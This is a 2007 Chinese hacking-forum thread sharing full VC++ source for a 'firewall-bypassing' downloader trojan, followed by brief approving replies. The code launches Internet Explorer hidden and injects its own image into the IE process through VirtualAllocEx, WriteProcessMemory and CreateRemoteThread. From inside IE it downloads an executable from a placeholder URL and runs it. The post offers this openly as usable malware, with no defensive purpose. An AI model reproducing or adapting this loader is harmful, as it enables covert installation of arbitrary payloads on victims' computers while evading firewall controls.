查看完整版本: [VC源码]3k穿墙下载者

[VC源码]3k穿墙下载者

[size=2][code]/*
   "mini_downloader"
   code bykardinal p.s.t
   compile by vc++ 6.0
   can not run under win98;
*/
#include <windows.h>

#pragma comment(lib,"user32.lib")
#pragma comment(lib,"kernel32.lib")

//#pragma comment(linker, "/OPT:NOWIN98")   //取消这几行的注释，编译出的文件只有2K大小
//#pragma comment(linker, "/merge:.data=.text")   
//#pragma comment(linker, "/merge:.rdata=.text")   
//#pragma comment(linker, "/align:0x200")
#pragma comment(linker, "/ENTRY:main")   
#pragma comment(linker, "/subsystem:windows")
#pragma comment(linker, "/BASE:0x13150000")
   
   HINSTANCE (WINAPI *SHELLRUN)(HWND,LPCTSTR, LPCTSTR, LPCTSTR ,LPCTSTR , int );//动态加载shell32.dll中的ShellExecuteA函数
   DWORD(WINAPI *DOWNFILE) (LPCTSTR ,LPCTSTR, LPCTSTR ,DWORD, LPCTSTR);//动态加载Urlmon.dll中的UrlDownloadToFileA函数
   HANDLE processhandle;
   DWORD pid;
   HINSTANCE hshell,hurlmon;

void download() //注入使用的下载函数
{
   hshell=LoadLibrary("Shell32.dll");
   hurlmon=LoadLibrary("urlmon.dll");

   (FARPROC&)SHELLRUN=GetProcAddress(hshell,"ShellExecuteA");
   (FARPROC&)DOWNFILE= GetProcAddress(hurlmon,"URLDownloadToFileA");

   DOWNFILE(NULL,"http://www.xxxxxxx.cn/en/notepad.exe","c:\\ieinst12.exe",0, NULL);
   SHELLRUN(0,"open","c:\\ieinst12.exe",NULL,NULL,5);
   ExitProcess(0);
};
   

void main() //主函数
{   
    //1.得到IE路径,并运行
   char iename[MAX_PATH],iepath[MAX_PATH];
   ZeroMemory(iename,sizeof(iename));
   ZeroMemory(iepath,sizeof(iepath));

   GetWindowsDirectory(iepath,MAX_PATH);
   strncpy(iename,iepath,3);
   strcat(iename,"program files\\Internet Explorer\\IEXPLORE.EXE");
   //strcat(iename,"windows\\notepad.EXE");
   WinExec(iename,SW_HIDE);
   Sleep(500);

   //2.得到 IE process handle
   HWND htemp;
   htemp=FindWindow("IEFrame",NULL);
   GetWindowThreadProcessId(htemp,&pid);
   processhandle=OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
   
   //3.分配内存
   HMODULE Module;
   LPVOID NewModule;
   DWORD Size;
   LPDWORD lpimagesize;

   Module = GetModuleHandle(NULL);//进程映像的基址
   //得到内存镜像大小
   _asm
   {
       push eax;
       push ebx;
       mov ebx,Module;
       mov eax,[ebx+0x3c];
       lea eax,[ebx+eax+0x50];   
       mov eax,[eax]
       mov lpimagesize,eax;
       pop ebx;
       pop eax;
   };
   Size=(DWORD)lpimagesize;
   NewModule = VirtualAllocEx(processhandle, Module, Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);//确定起始基址和内存映像基址的位置

   //4.写内存，创建线程
   WriteProcessMemory(processhandle, NewModule, Module, Size, NULL);//写数据
   LPTHREAD_START_ROUTINE entrypoint;
   __asm
   {
       push eax;
       lea eax,download;
       mov entrypoint,eax;
       pop eax
   }
   
   CreateRemoteThread(processhandle, NULL, 0, entrypoint, Module, 0, NULL);    //建立远程线程,并运行
   
   //5.关闭对象
   CloseHandle(processhandle);
   return;
} ;[/code][/size]

[[i] 本帖最后由 逃学书童 于 2007-7-9 13:35 编辑 [/i]]

哈哈,找个研究下

我最喜欢收藏源代码了…………:lol

他是如何过防火墙的呢？？？？

支迟源码，支持发帖！！！:victory: :) :)

收藏了，顶一下。